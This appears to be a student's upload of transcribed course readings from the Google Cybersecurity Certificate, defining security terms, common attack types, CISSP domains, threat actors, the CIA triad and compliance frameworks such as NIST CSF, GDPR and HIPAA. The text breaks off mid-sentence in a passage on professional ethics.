Uploaded by Nickalas Bilotta

Google Cybersecurity Certification - 8 Course Transcriptions

advertisement
Google Cybersecurity Certification – 11/1/23
Common cybersecurity terminology
As you’ve learned, cybersecurity (also known as security) is the practice of ensuring confidentiality,
integrity, and availability of information by protecting networks, devices, people, and data from
unauthorized access or criminal exploitation. In this reading, you’ll be introduced to some key terms
used in the cybersecurity profession. Then, you’ll be provided with a resource that’s useful for staying
informed about changes to cybersecurity terminology.
There are many terms and concepts that are important for security professionals to know. Being
familiar with them can help you better identify the threats that can harm organizations and people alike.
A security analyst or cybersecurity analyst focuses on monitoring networks for breaches. They also help
develop strategies to secure an organization and research information technology (IT) security trends to
remain alert and informed about potential threats. Additionally, an analyst works to prevent incidents.
In order for analysts to effectively do these types of tasks, they need to develop knowledge of the
following key concepts.
Compliance is the process of adhering to internal standards and external regulations and enables
organizations to avoid fines and security breaches.
Security frameworks are guidelines used for building plans to help mitigate risks and threats to data and
privacy.
Security controls are safeguards designed to reduce specific security risks. They are used with security
frameworks to establish a strong security posture.
Security posture is an organization’s ability to manage its defense of critical assets and data and react to
change. A strong security posture leads to lower risk for the organization.
A threat actor, or malicious attacker, is any person or group who presents a security risk. This risk can
relate to computers, applications, networks, and data.
An internal threat can be a current or former employee, an external vendor, or a trusted partner who
poses a security risk. At times, an internal threat is accidental. For example, an employee who
accidentally clicks on a malicious email link would be considered an accidental threat. Other times, the
internal threat actor intentionally engages in risky activities, such as unauthorized data access.
Network security is the practice of keeping an organization's network infrastructure secure from
unauthorized access. This includes data, services, systems, and devices that are stored in an
organization’s network.
Cloud security is the process of ensuring that assets stored in the cloud are properly configured, or set
up correctly, and access to those assets is limited to authorized users. The cloud is a network made up of
a collection of servers or computers that store resources and data in remote physical locations known as
data centers that can be accessed via the internet. Cloud security is a growing subfield of cybersecurity
that specifically focuses on the protection of data, applications, and infrastructure in the cloud.
Programming is a process that can be used to create a specific set of instructions for a computer to
execute tasks. These tasks can include:
●
●
●
Automation of repetitive tasks (e.g., searching a list of malicious domains)
Reviewing web traffic
Alerting suspicious activity
Key takeaways
Understanding key technical terms and concepts used in the security field will help prepare you for your
role as a security analyst. Knowing these terms can help you identify common threats, risks, and
vulnerabilities. To explore a variety of cybersecurity terms, visit the National Institute of Standards and
Technology glossary. Or use your browser to search for high-quality, reliable cybersecurity glossaries
from research institutes or governmental authorities. Glossaries are available in multiple languages.
Transferable Skills from other backgrounds to Cybersecurity
Communication
Communication is a transferable skill for a security analyst. They will often need to describe certain
threats, risks, or vulnerabilities to people who may not have a technical background. For example,
security analysts may be tasked with interpreting and communicating policies and procedures to other
employees. Or analysts may be asked to report findings to their supervisors, so the appropriate
actions can be taken to secure the organization.
Collaboration
Security analysts often work in teams with engineers, digital forensic investigators, and program
managers. For example, if you are working to roll out a new security feature, you will likely have a
project manager, an engineer, and an ethical hacker on your team. Security analysts also need to be able
to analyze complex scenarios that they may encounter. For example, a security analyst may need to
make recommendations about how different tools can support efficiency and safeguard an
organization's internal network.
Problem Solving
Identifying a security problem and then diagnosing it and providing solutions is a necessary skill to
keep business operations safe. Understanding threat actors and identifying trends can provide insight
on how to handle future threats.
Technical Skills needed include: Programming Languages like Python and SQL and knowledge of
SIEM tools/resources to deal with security incidents.
Transferable and technical cybersecurity skills
Previously, you learned that cybersecurity analysts need to develop certain core skills to be successful at
work. Transferable skills are skills from other areas of study or practice that can apply to different
careers. Technical skills may apply to several professions, as well; however, they typically require
knowledge of specific tools, procedures, and policies. In this reading, you’ll explore both transferable
skills and technical skills further.
Transferable skills
You have probably developed many transferable skills through life experiences; some of those skills will
help you thrive as a cybersecurity professional. These include:
●
●
●
●
●
Communication: As a cybersecurity analyst, you will need to communicate and collaborate with
others. Understanding others’ questions or concerns and communicating information clearly to
individuals with technical and non-technical knowledge will help you mitigate security issues
quickly.
Problem-solving: One of your main tasks as a cybersecurity analyst will be to proactively identify
and solve problems. You can do this by recognizing attack patterns, then determining the most
efficient solution to minimize risk. Don't be afraid to take risks, and try new things. Also,
understand that it's rare to find a perfect solution to a problem. You’ll likely need to
compromise.
Time management: Having a heightened sense of urgency and prioritizing tasks appropriately is
essential in the cybersecurity field. So, effective time management will help you minimize
potential damage and risk to critical assets and data. Additionally, it will be important to
prioritize tasks and stay focused on the most urgent issue.
Growth mindset: This is an evolving industry, so an important transferable skill is a willingness
to learn. Technology moves fast, and that's a great thing! It doesn't mean you will need to learn it
all, but it does mean that you’ll need to continue to learn throughout your career. Fortunately,
you will be able to apply much of what you learn in this program to your ongoing professional
development.
Diverse perspectives: The only way to go far is together. By having respect for each other and
encouraging diverse perspectives and mutual respect, you’ll undoubtedly find multiple and
better solutions to security problems.
Technical skills
There are many technical skills that will help you be successful in the cybersecurity field. You’ll learn
and practice these skills as you progress through the certificate program. Some of the tools and concepts
you’ll need to use and be able to understand include:
●
●
●
●
●
Programming languages: By understanding how to use programming languages, cybersecurity
analysts can automate tasks that would otherwise be very time consuming. Examples of tasks
that programming can be used for include searching data to identify potential threats or
organizing and analyzing information to identify patterns related to security issues.
Security information and event management (SIEM) tools: SIEM tools collect and analyze log
data, or records of events such as unusual login behavior, and support analysts’ ability to
monitor critical activities in an organization. This helps cybersecurity professionals identify and
analyze potential security threats, risks, and vulnerabilities more efficiently.
Intrusion detection systems (IDSs): Cybersecurity analysts use IDSs to monitor system activity
and alerts for possible intrusions. It’s important to become familiar with IDSs because they’re a
key tool that every organization uses to protect assets and data. For example, you might use an
IDS to monitor networks for signs of malicious activity, like unauthorized access to a network.
Threat landscape knowledge: Being aware of current trends related to threat actors, malware, or
threat methodologies is vital. This knowledge allows security teams to build stronger defenses
against threat actor tactics and techniques. By staying up to date on attack trends and patterns,
security professionals are better able to recognize when new types of threats emerge such as a
new ransomware variant.
Incident response: Cybersecurity analysts need to be able to follow established policies and
procedures to respond to incidents appropriately. For example, a security analyst might receive
an alert about a possible malware attack, then follow the organization’s outlined procedures to
start the incident response process. This could involve conducting an investigation to identify
the root issue and establishing ways to remediate it.
CompTIA Security+
In addition to gaining skills that will help you succeed as a cybersecurity professional, the Google
Cybersecurity Certificate helps prepare you for the CompTIA Security+ exam, the industry leading
certification for cybersecurity roles. You’ll earn a dual credential when you complete both, which can be
shared with potential employers. After completing all eight courses in the Google Cybersecurity
Certificate, you will unlock a 30% discount for the CompTIA Security+ exam and additional practice
materials.
Key takeaways
Understanding the benefits of core transferable and technical skills can help prepare you to successfully
enter the cybersecurity workforce. Throughout this program, you’ll have multiple opportunities to
develop these and other key cybersecurity analyst skills.
As we've discussed, security professionals protect many physical and digital assets. These skills are
desired by organizations and government entities because risk needs to be managed. Let's continue
to discuss why security matters. Security is essential for ensuring an organization's business
continuity and ethical standing. There are both legal implications and moral considerations to
maintaining an organization's security. A data breach, for example, affects everyone that is
associated with the organization. This is because data losses or leaks can affect an organization's
reputation as well as the lives and reputations of their users, clients, and customers. By maintaining
strong security measures, organizations can increase user trust. This may lead to financial growth
and ongoing business referrals. As previously mentioned, organizations are not the only ones that
suffer during a data breach. Maintaining and securing user, customer, and vendor data is an
important part of preventing incidents that may expose people's personally identifiable
information. Personally identifiable information, known as PII, is any information used to infer an
individual's identity. PII includes someone's full name,
date of birth, physical address, phone number, email address, internet protocol, or IP address and
similar information. Sensitive personally identifiable information, known as SPII, is a specific type
of PII that falls under stricter handling guidelines and may include social security numbers,
medical or financial information, and biometric data, such as facial recognition. If SPII is stolen,
this has the potential to be significantly more damaging to an individual than if PII is stolen. PII and
SPII data are key assets that a threat actor will look for if an organization experiences a breach.
When a person's identifiable information is compromised, leaked, or stolen, identity theft is the
primary concern. Identity theft is the act of stealing personal information to commit fraud while
impersonating a victim. And the primary objective of identity theft is financial gain. We've explored
several reasons why security matters. Employers need security analysts like you to fill the current
and future demand to protect data, products, and people while ensuring confidentiality, integrity,
and safe access to information. This is why the U.S. Bureau of Labor Statistics expects the demand
for security professionals to grow by more than 30% by the year 2030.
Terms and definitions from Course 1, Module 1
Cybersecurity (or security): The practice of ensuring confidentiality, integrity, and
availability of information by protecting networks, devices, people, and data from
unauthorized access or criminal exploitation
Cloud security: The process of ensuring that assets stored in the cloud are properly
configured and access to those assets is limited to authorized users
Internal threat: A current or former employee, external vendor, or trusted partner who
poses a security risk
Network security: The practice of keeping an organization's network infrastructure secure
from unauthorized access
Personally identifiable information (PII): Any information used to infer an individual’s
identity
Security posture: An organization’s ability to manage its defense of critical assets and data
and react to change
Sensitive personally identifiable information (SPII): A specific type of PII that falls under
stricter handling guidelines
Technical skills: Skills that require knowledge of specific tools, procedures, and policies
Threat: Any circumstance or event that can negatively impact assets
Threat actor: Any person or group who presents a security risk
Transferable skills: Skills from other areas that can apply to different careers
Course 2
Common attacks and their effectiveness
Previously, you learned about past and present attacks that helped shape the cybersecurity
industry. These included the LoveLetter attack, also called the ILOVEYOU virus, and the
Morris worm. One outcome was the establishment of response teams, which are now
commonly referred to as computer security incident response teams (CSIRTs). In this
reading, you will learn more about common methods of attack. Becoming familiar with
different attack methods, and the evolving tactics and techniques threat actors use, will
help you better protect organizations and people.
Phishing
Phishing is the use of digital communications to trick people into revealing sensitive data or
deploying malicious software.
Some of the most common types of phishing attacks today include:
Business Email Compromise (BEC): A threat actor sends an email message that
seems to be from a known source to make a seemingly legitimate request for
information, in order to obtain a financial advantage.
● Spear phishing: A malicious email attack that targets a specific user or group of
users. The email seems to originate from a trusted source.
●
Whaling: A form of spear phishing. Threat actors target company executives to gain
access to sensitive data.
● Vishing: The exploitation of electronic voice communication to obtain sensitive
information or to impersonate a known source.
● Smishing: The use of text messages to trick users, in order to obtain sensitive
information or to impersonate a known source.
●
Malware
Malware is software designed to harm devices or networks. There are many types of
malware. The primary purpose of malware is to obtain money, or in some cases, an
intelligence advantage that can be used against a person, an organization, or a territory.
Some of the most common types of malware attacks today include:
Viruses: Malicious code written to interfere with computer operations and cause
damage to data and software. A virus needs to be initiated by a user (i.e., a threat
actor), who transmits the virus via a malicious attachment or file download. When
someone opens the malicious attachment or download, the virus hides itself in other
files in the now infected system. When the infected files are opened, it allows the
virus to insert its own code to damage and/or destroy data in the system.
● Worms: Malware that can duplicate and spread itself across systems on its own. In
contrast to a virus, a worm does not need to be downloaded by a user. Instead, it
self-replicates and spreads from an already infected computer to other devices on
the same network.
● Ransomware: A malicious attack where threat actors encrypt an organization's data
and demand payment to restore access.
● Spyware: Malware that’s used to gather and sell information without consent.
Spyware can be used to access devices. This allows threat actors to collect personal
data, such as private emails, texts, voice and image recordings, and locations.
●
Social Engineering
Social engineering is a manipulation technique that exploits human error to gain private
information, access, or valuables. Human error is usually a result of trusting someone
without question. It’s the mission of a threat actor, acting as a social engineer, to create an
environment of false trust and lies to exploit as many people as possible.
Some of the most common types of social engineering attacks today include:
Social media phishing: A threat actor collects detailed information about their target
from social media sites. Then, they initiate an attack.
● Watering hole attack: A threat actor attacks a website frequently visited by a specific
group of users.
●
USB baiting: A threat actor strategically leaves a malware USB stick for an employee
to find and install, to unknowingly infect a network.
● Physical social engineering: A threat actor impersonates an employee, customer, or
vendor to obtain unauthorized access to a physical location.
●
Social engineering principles
Social engineering is incredibly effective. This is because people are generally trusting and
conditioned to respect authority. The number of social engineering attacks is increasing
with every new social media application that allows public access to people's data.
Although sharing personal data—such as your location or photos—can be convenient, it’s
also a risk.
Reasons why social engineering attacks are effective include:
●
●
●
●
●
●
●
Authority: Threat actors impersonate individuals with power. This is because
people, in general, have been conditioned to respect and follow authority figures.
Intimidation: Threat actors use bullying tactics. This includes persuading and
intimidating victims into doing what they’re told.
Consensus/Social proof: Because people sometimes do things that they believe many
others are doing, threat actors use others’ trust to pretend they are legitimate. For
example, a threat actor might try to gain access to private data by telling an
employee that other people at the company have given them access to that data in
the past.
Scarcity: A tactic used to imply that goods or services are in limited supply.
Familiarity: Threat actors establish a fake emotional connection with users that can
be exploited.
Trust: Threat actors establish an emotional relationship with users that can be
exploited over time. They use this relationship to develop trust and gain personal
information.
Urgency: A threat actor persuades others to respond quickly and without
questioning.
Key takeaways
In this reading, you learned about some common attacks and their impacts. You also
learned about social engineering and why it’s so successful. While this is only a brief
introduction to attack types, you will have many opportunities throughout the program to
further develop your understanding of how to identify and defend against cybersecurity
attacks.
As the tactics of threat actors evolve, so do the roles of security professionals. Having a solid
understanding of core security concepts will support your growth in this field. One way to better
understand these core concepts is by organizing them into categories, called security domains.
As of 2022, CISSP has defined eight domains to organize the work of security professionals.
It's important to understand that these domains are related and that gaps in one domain can result in
negative consequences to an entire organization. It's also important to understand the domains because
it may help you better understand your career goals and your role within an organization.
As you learn more about the elements of each domain, the work involved in one may appeal to you more
than the others. This domain may become a career path for you to explore further.
CISSP defines eight domains in total, and we'll discuss all eight between this video and the next.
In this video, we're going to cover the first four: security and risk management, asset security,
security architecture and engineering, and communication and network security. Let's start with the first
domain, security and risk management. Security and risk management focuses on defining security goals
and objectives, risk mitigation, compliance, business continuity, and the law.
For example, security analysts may need to update company policies related to private health
information if a change is made to a federal compliance regulation such as the Health Insurance
Portability and Accountability Act, also known as HIPAA.
The second domain is asset security. This domain focuses on securing digital and physical assets. It's also
related to the storage, maintenance, retention, and destruction of data. When working with this domain,
security analysts may be tasked with making sure that old equipment is properly disposed of
and destroyed, including any type of confidential information.
The third domain is security architecture and engineering. This domain focuses on optimizing data
security by ensuring effective tools, systems, and processes are in place. As a security analyst, you may
be tasked with configuring a firewall. A firewall is a device used to monitor and filter incoming
and outgoing computer network traffic. Setting up a firewall correctly helps prevent attacks that could
affect productivity.
The fourth security domain is communication and network security. This domain focuses on managing
and securing physical networks and wireless communications. As a security analyst, you may be asked
to analyze user behavior within your organization. Imagine discovering that users are connecting to
unsecured wireless hotspots. This could leave the organization and its employees vulnerable to attacks.
The next four security domains: identity and access management, security assessment and
testing, security operations, and software development security.
Familiarizing yourself with these domains will allow you to navigate the complex world of security.
The domains outline and organize how a team of security professionals work together. Depending on
the organization, analyst roles may sit at the intersection of multiple domains or focus on one specific
domain. Knowing where a particular role fits within the security landscape will help you prepare for job
interviews and work as part of a full security team.
Let's move into the fifth domain: identity and access management.
Identity and access management focuses on keeping data secure, by ensuring users follow established
policies to control and manage physical assets, like office spaces, and logical assets, such as networks
and applications. Validating the identities of employees and documenting access roles are essential to
maintaining the organization's physical and digital security. For example, as a security analyst, you may
be tasked with setting up employees' keycard access to buildings.
The sixth domain is security assessment and testing.
This domain focuses on conducting security control testing, collecting and analyzing data, and
conducting security audits to monitor for risks, threats, and vulnerabilities. Security analysts may
conduct regular audits of user permissions, to make sure that users have the correct level of access. For
example, access to payroll information is often limited to certain employees, so
analysts may be asked to regularly audit permissions to ensure that no unauthorized person
can view employee salaries.
The seventh domain is security operations. This domain focuses on conducting
investigations and implementing preventative measures. Imagine that you, as a security analyst, receive
an alert that an unknown device has been connected to your internal network.
You would need to follow the organization's policies and procedures to quickly stop the potential threat.
The final, eighth domain is software development security.
This domain focuses on using secure coding practices, which are a set of recommended guidelines that
are used to create secure applications and services.
A security analyst may work with software development teams to ensure
security practices are incorporated into the software development life-cycle. If, for example,
one of your partner teams is creating a new mobile app, then you may be asked to
advise on the password policies or ensure that any user data is
properly secured and managed.
Password attack
A password attack is an attempt to access password-secured devices, systems, networks, or
data. Some forms of password attacks that you’ll learn about later in the certificate
program are:
●
●
Brute force
Rainbow table
Password attacks fall under the communication and network security domain.
Social engineering attack
Social engineering is a manipulation technique that exploits human error to gain private
information, access, or valuables. Some forms of social engineering attacks that you will
continue to learn about throughout the program are:
●
●
●
●
●
●
●
●
●
●
Phishing
Smishing
Vishing
Spear phishing
Whaling
Social media phishing
Business Email Compromise (BEC)
Watering hole attack
USB (Universal Serial Bus) baiting
Physical social engineering
Social engineering attacks are related to the security and risk management domain.
Physical attack
A physical attack is a security incident that affects not only digital but also physical
environments where the incident is deployed. Some forms of physical attacks are:
●
●
●
Malicious USB cable
Malicious flash drive
Card cloning and skimming
Physical attacks fall under the asset security domain.
Adversarial artificial intelligence
Adversarial artificial intelligence is a technique that manipulates artificial intelligence and
machine learning technology to conduct attacks more efficiently. Adversarial artificial
intelligence falls under both the communication and network security and the identity and
access management domains.
Supply-chain attack
A supply-chain attack targets systems, applications, hardware, and/or software to locate a
vulnerability where malware can be deployed. Because every item sold undergoes a
process that involves third parties, this means that the security breach can occur at any
point in the supply chain. These attacks are costly because they can affect multiple
organizations and the individuals who work for them. Supply-chain attacks can fall under
several domains, including but not limited to the security and risk management, security
architecture and engineering, and security operations domains.
Cryptographic attack
A cryptographic attack affects secure forms of communication between a sender and
intended recipient. Some forms of cryptographic attacks are:
●
●
●
Birthday
Collision
Downgrade
Cryptographic attacks fall under the communication and network security domain.
Key takeaways
The eight CISSP security domains can help an organization and its security team fortify
against and prepare for a data breach. Data breaches range from simple to complex and fall
under one or more domains. Note that the methods of attack discussed are only a few of
many. These and other types of attacks will be discussed throughout the certificate
program.
Resources for more information
To view detailed information and definitions of terms covered in this reading, visit the
National Institute of Standards and Technology (NIST) glossary.
Pro tip: If you cannot find a term in the NIST glossary, enter the appropriate search term
(e.g., “cybersecurity birthday attack”) into your preferred search engine to locate the
definition in another reliable source such as a .edu or .gov site.
Understand attackers
Previously, you were introduced to the concept of threat actors. As a reminder, a threat actor is any
person or group who presents a security risk. In this reading, you’ll learn about different types of threat
actors. You will also learn about their motivations, intentions, and how they’ve influenced the security
industry.
Threat actor types
Advanced persistent threats
Advanced persistent threats (APTs) have significant expertise accessing an organization's network
without authorization. APTs tend to research their targets (e.g., large corporations or government
entities) in advance and can remain undetected for an extended period of time. Their intentions and
motivations can include:
●
Damaging critical infrastructure, such as the power grid and natural resources
●
Gaining access to intellectual property, such as trade secrets or patents
Insider threats
Insider threats abuse their authorized access to obtain data that may harm an organization. Their
intentions and motivations can include:
●
●
●
●
Sabotage
Corruption
Espionage
Unauthorized data access or leaks
Hacktivists
Hacktivists are threat actors that are driven by a political agenda. They abuse digital technology to
accomplish their goals, which may include:
●
●
●
●
Demonstrations
Propaganda
Social change campaigns
Fame
Hacker types
A hacker is any person who uses computers to gain access to computer systems, networks, or data. They
can be beginner or advanced technology professionals who use their skills for a variety of reasons. There
are three main categories of hackers:
●
●
●
Authorized hackers are also called ethical hackers. They follow a code of ethics and adhere to
the law to conduct organizational risk evaluations. They are motivated to safeguard people and
organizations from malicious threat actors.
Semi-authorized hackers are considered researchers. They search for vulnerabilities but don’t
take advantage of the vulnerabilities they find.
Unauthorized hackers are also called unethical hackers. They are malicious threat actors who do
not follow or respect the law. Their goal is to collect and sell confidential data for financial gain.
Note: There are multiple hacker types that fall into one or more of these three categories.
New and unskilled threat actors have various goals, including:
●
●
●
To learn and enhance their hacking skills
To seek revenge
To exploit security weaknesses by using existing malware, programming scripts, and other
tactics
Other types of hackers are not motivated by any particular agenda other than completing the job they
were contracted to do. These types of hackers can be considered unethical or ethical hackers. They have
been known to work on both illegal and legal tasks for pay.
There are also hackers who consider themselves vigilantes. Their main goal is to protect the world from
unethical hackers.
Key takeaways
Threat actors and hackers are technically skilled individuals. Understanding their motivations and
intentions will help you be better prepared to protect your organization and the people it serves from
malicious attacks carried out by some of these individuals and groups.
Resources for more information
To learn more about how security teams work to keep organizations and people safe, explore the
Hacking Google series of videos.
Glossary terms from module 2
Terms and definitions from Course 1, Module 2
Adversarial artificial intelligence (AI): A technique that manipulates artificial intelligence (AI) and
machine learning (ML) technology to conduct attacks more efficiently
Business Email Compromise (BEC): A type of phishing attack where a threat actor impersonates a known
source to obtain financial advantage
Computer virus: Malicious code written to interfere with computer operations and cause damage to data
and software
Cryptographic attack: An attack that affects secure forms of communication between a sender and
intended recipient
Hacker: Any person who uses computers to gain access to computer systems, networks, or data
Malware: Software designed to harm devices or networks
Password attack: An attempt to access password secured devices, systems, networks, or data
Phishing: The use of digital communications to trick people into revealing sensitive data or deploying
malicious software
Physical attack: A security incident that affects not only digital but also physical environments where the
incident is deployed
Physical social engineering: An attack in which a threat actor impersonates an employee, customer, or
vendor to obtain unauthorized access to a physical location
Social engineering: A manipulation technique that exploits human error to gain private information,
access, or valuables
Social media phishing: A type of attack where a threat actor collects detailed information about their
target on social media sites before initiating the attack
Spear phishing: A malicious email attack targeting a specific user or group of users, appearing to
originate from a trusted source
Supply-chain attack: An attack that targets systems, applications, hardware, and/or software to locate a
vulnerability where malware can be deployed
USB baiting: An attack in which a threat actor strategically leaves a malware USB stick for an employee
to find and install to unknowingly infect a network
Virus: refer to “computer virus”
Vishing: The exploitation of electronic voice communication to obtain sensitive information or to
impersonate a known source
Watering hole attack: A type of attack when a threat actor compromises a website frequently visited by a
specific group of users
Security Frameworks and Controls
Imagine you're working as a security analyst and receive multiple alerts about suspicious
activity on the network. You realize that you'll need to implement additional security
measures to keep these alerts from becoming serious incidents. But where do you start? As an
analyst, you'll start by identifying your organization's critical assets and risks. Then you'll
implement the necessary frameworks and controls. In this video, we'll discuss how security
professionals use frameworks to continuously identify and manage risk. We'll also cover how to use
security controls to manage or reduce specific risks. Security frameworks are guidelines used for
building plans to help mitigate risks and threats to data and privacy. Security frameworks provide a
structured approach to implementing a security lifecycle. The security lifecycle is a constantly
evolving set of policies and standards that define how an organization
manages risks, follows established guidelines, and meets regulatory compliance, or laws. There are
several security frameworks that may be used to manage different types of organizational and
regulatory compliance risks. The purpose of security frameworks include protecting personally
identifiable information, known as PII, securing financial information, identifying security
weaknesses, managing organizational risks, and aligning security with business goals. Frameworks
have four core components and understanding them will allow you to better manage potential
risks.
The first core component is identifying and documenting security goals. For example, an
organization may have a goal to align with the E.U.'s General Data Protection Regulation, also
known as GDPR. GDPR is a data protection law established to grant European citizens more control
over their personal data. A security analyst may be asked to identify and document areas where an
organization is out of compliance with GDPR.
The second core component is setting guidelines to achieve security goals. For example, when
implementing guidelines to achieve GDPR compliance, your organization may need to develop new
policies for how to handle data requests from individual users.
The third core component of security frameworks is implementing strong security processes. In the
case of GDPR, a security analyst working for a social media company may help design procedures to
ensure the organization complies with verified user data requests. An example of this type of
request is when a user attempts to update or delete their profile information.
The last core component of security frameworks is monitoring and communicating results. As an
example, you may monitor your organization's internal network and report a potential security
issue affecting GDPR to your manager or regulatory compliance officer. Now that we've introduced
the four core components
of security frameworks, let's tie them all together.
Frameworks allow analysts to work alongside other members of the security team to document,
implement, and use the policies and procedures that have been created. It's essential for an entrylevel analyst to understand this process because it directly affects the work they do and how they
collaborate with others. Next, we'll discuss security controls. Security controls are safeguards
designed to reduce specific security risks. For example, your company may have a guideline that
requires all employees to complete a privacy training to reduce the risk of data breaches. As a
security analyst, you may use a software tool to automatically assign and track which employees
have completed this training. Security frameworks and controls are vital to managing security for
all types of organizations and ensuring that everyone is doing their part to maintain a low level of
risk. Understanding their purpose and how they are used allows analysts to support an
organization's security goals and protect the people it serves. In the following videos, we'll discuss
some well-known frameworks and principles that analysts need to be aware of to minimize risk
and protect data and users.
The CIA triad is a foundational model that helps inform how organizations consider risk when
setting up systems and security policies. CIA stands for confidentiality, integrity, and availability.
Confidentiality means that only authorized users can access specific assets or data. For example,
strict access controls that define who should and should not have access to data, must be put in
place to ensure confidential data remains safe. Integrity means the data is correct, authentic, and
reliable. To maintain integrity, security professionals can use a form of data protection like
encryption to safeguard data from being tampered with. Availability means data is accessible to
those who are authorized to access it. Let's define a term that came up during our discussion of the
CIA triad: asset. An asset is an item perceived as having value to an organization. And value is
determined by the cost associated with the asset in question. For example, an application that
stores sensitive data, such as social security numbers or bank accounts, is a valuable asset to an
organization. It carries more risk and therefore requires tighter security controls in comparison to
a website that shares publicly available news content. As you may remember, earlier in the course,
we discussed frameworks and controls in general. Now, we'll discuss a specific framework
developed by the U.S.-based National Institute of Standards and Technology: the Cybersecurity
Framework, also referred to as the NIST CSF. The NIST Cybersecurity Framework is a voluntary
framework that consists of standards, guidelines, and best practices to manage cybersecurity risk.
It's important to become familiar with this framework because security teams use it as a baseline to
manage short and long-term risk. Managing and mitigating risks and protecting an organization's
assets from threat actors are key goals for security professionals. Understanding the different
motives a threat actor may have, alongside identifying your organization's most valuable assets is
important. Some of the most dangerous threat actors to consider are disgruntled employees. They
are the most dangerous because they often have access to sensitive information and know where to
find it. In order to reduce this type of risk, security professionals would use the principle of
availability, as well as organizational guidelines based on frameworks to ensure staff members can
only access the data they need to perform their jobs. Threat actors originate from all across the
globe, and a diverse workforce of security professionals helps organizations identify attackers'
intentions. A variety of perspectives can assist organizations in understanding and mitigating the
impact of malicious activity. That concludes our introduction to the CIA triad and NIST CSF
framework, which are used to develop processes to secure organizations and the people they serve.
You may be asked in an interview if you know about security frameworks and principles. Or you
may be asked to explain how they're used to secure organizational assets. In either case,
throughout this program, you'll have multiple opportunities to learn more about them and apply
what we've discussed to real-world situations.
Course 3
Controls, frameworks, and compliance
Previously, you were introduced to security frameworks and how they provide a
structured approach to implementing a security lifecycle. As a reminder, a security lifecycle
is a constantly evolving set of policies and standards. In this reading, you will learn more
about how security frameworks, controls, and compliance regulations—or laws—are used
together to manage security and make sure everyone does their part to minimize risk.
How controls, frameworks, and compliance are related
The confidentiality, integrity, and availability (CIA) triad is a model that helps inform how
organizations consider risk when setting up systems and security policies.
CIA are the three foundational principles used by cybersecurity professionals to establish
appropriate controls that mitigate threats, risks, and vulnerabilities.
As you may recall, security controls are safeguards designed to reduce specific security
risks. So they are used alongside frameworks to ensure that security goals and processes
are implemented correctly and that organizations meet regulatory compliance
requirements.
Security frameworks are guidelines used for building plans to help mitigate risks and
threats to data and privacy. They have four core components:
1.
2.
3.
4.
Identifying and documenting security goals
Setting guidelines to achieve security goals
Implementing strong security processes
Monitoring and communicating results
Compliance is the process of adhering to internal standards and external regulations.
Specific controls, frameworks, and compliance
The National Institute of Standards and Technology (NIST) is a U.S.-based agency that
develops multiple voluntary compliance frameworks that organizations worldwide can use
to help manage risk. The more aligned an organization is with compliance, the lower the
risk.
Examples of frameworks include the NIST Cybersecurity Framework (CSF) and the NIST
Risk Management Framework (RMF).
Note: Specifications and guidelines can change depending on the type of organization you
work for.
In addition to the NIST CSF and NIST RMF, there are several other controls, frameworks,
and compliance standards that it is important for security professionals to be familiar with
to help keep organizations and the people they serve safe.
The Federal Energy Regulatory Commission - North American Electric Reliability
Corporation (FERC-NERC)
FERC-NERC is a regulation that applies to organizations that work with electricity or that
are involved with the U.S. and North American power grid. These types of organizations
have an obligation to prepare for, mitigate, and report any potential security incident that
can negatively affect the power grid. They are also legally required to adhere to the Critical
Infrastructure Protection (CIP) Reliability Standards defined by the FERC.
The Federal Risk and Authorization Management Program (FedRAMP®)
FedRAMP is a U.S. federal government program that standardizes security assessment,
authorization, monitoring, and handling of cloud services and product offerings. Its
purpose is to provide consistency across the government sector and third-party cloud
providers.
Center for Internet Security (CIS®)
CIS is a nonprofit with multiple areas of emphasis. It provides a set of controls that can be
used to safeguard systems and networks against attacks. Its purpose is to help
organizations establish a better plan of defense. CIS also provides actionable controls that
security professionals may follow if a security incident occurs.
General Data Protection Regulation (GDPR)
GDPR is a European Union (E.U.) general data regulation that protects the processing of
E.U. residents’ data and their right to privacy in and out of E.U. territory. For example, if an
organization is not being transparent about the data they are holding about an E.U. citizen
and why they are holding that data, this is an infringement that can result in a fine to the
organization. Additionally, if a breach occurs and an E.U. citizen’s data is compromised,
they must be informed. The affected organization has 72 hours to notify the E.U. citizen
about the breach.
Payment Card Industry Data Security Standard (PCI DSS)
PCI DSS is an international security standard meant to ensure that organizations storing,
accepting, processing, and transmitting credit card information do so in a secure
environment. The objective of this compliance standard is to reduce credit card fraud.
The Health Insurance Portability and Accountability Act (HIPAA)
HIPAA is a U.S. federal law established in 1996 to protect patients' health information. This
law prohibits patient information from being shared without their consent. It is governed
by three rules:
1. Privacy
2. Security
3. Breach notification
Organizations that store patient data have a legal obligation to inform patients of a breach
because if patients' Protected Health Information (PHI) is exposed, it can lead to identity
theft and insurance fraud. PHI relates to the past, present, or future physical or mental
health or condition of an individual, whether it’s a plan of care or payments for care. Along
with understanding HIPAA as a law, security professionals also need to be familiar with the
Health Information Trust Alliance (HITRUST®), which is a security framework and
assurance program that helps institutions meet HIPAA compliance.
International Organization for Standardization (ISO)
ISO was created to establish international standards related to technology, manufacturing,
and management across borders. It helps organizations improve their processes and
procedures for staff retention, planning, waste, and services.
System and Organizations Controls (SOC type 1, SOC type 2)
The American Institute of Certified Public Accountants® (AICPA) auditing standards board
developed this standard. The SOC1 and SOC2 are a series of reports that focus on an
organization's user access policies at different organizational levels such as:
●
●
●
●
●
●
Associate
Supervisor
Manager
Executive
Vendor
Others
They are used to assess an organization’s financial compliance and levels of risk. They also
cover confidentiality, privacy, integrity, availability, security, and overall data safety.
Control failures in these areas can lead to fraud.
Pro tip: There are a number of regulations that are frequently revised. You are encouraged to keep
up-to-date with changes and explore more frameworks, controls, and compliance. Two suggestions
to research: the Gramm-Leach-Bliley Act and the Sarbanes-Oxley Act.
United States Presidential Executive Order 14028
On May 12, 2021, President Joe Biden released an executive order related to improving the nation’s
cybersecurity to remediate the increase in threat actor activity. Remediation efforts are directed
toward federal agencies and third parties with ties to U.S. critical infrastructure. For additional
information, review the Executive Order on Improving the Nation’s Cybersecurity.
Key takeaways
In this reading you learned more about controls, frameworks, and compliance. You also learned
how they work together to help organizations maintain a low level of risk.
As a security analyst, it’s important to stay up-to-date on common frameworks, controls, and
compliance regulations and be aware of changes to the cybersecurity landscape to help ensure the
safety of both organizations and people.
In security, new technologies present new challenges. For every new security incident or risk, the
right or wrong decision isn't always clear. For example, imagine that you're working as an entrylevel security analyst and you have received a high risk alert. You investigate the alert and discover
data has been transferred without authorization. You work diligently to identify who made the
transfer and discover it is one of your friends from work. What do you do? Ethically, as a security
professional, your job is to remain unbiased and maintain security and confidentiality. While it's
normal to want to protect a friend, regardless of who the user in question may be, your
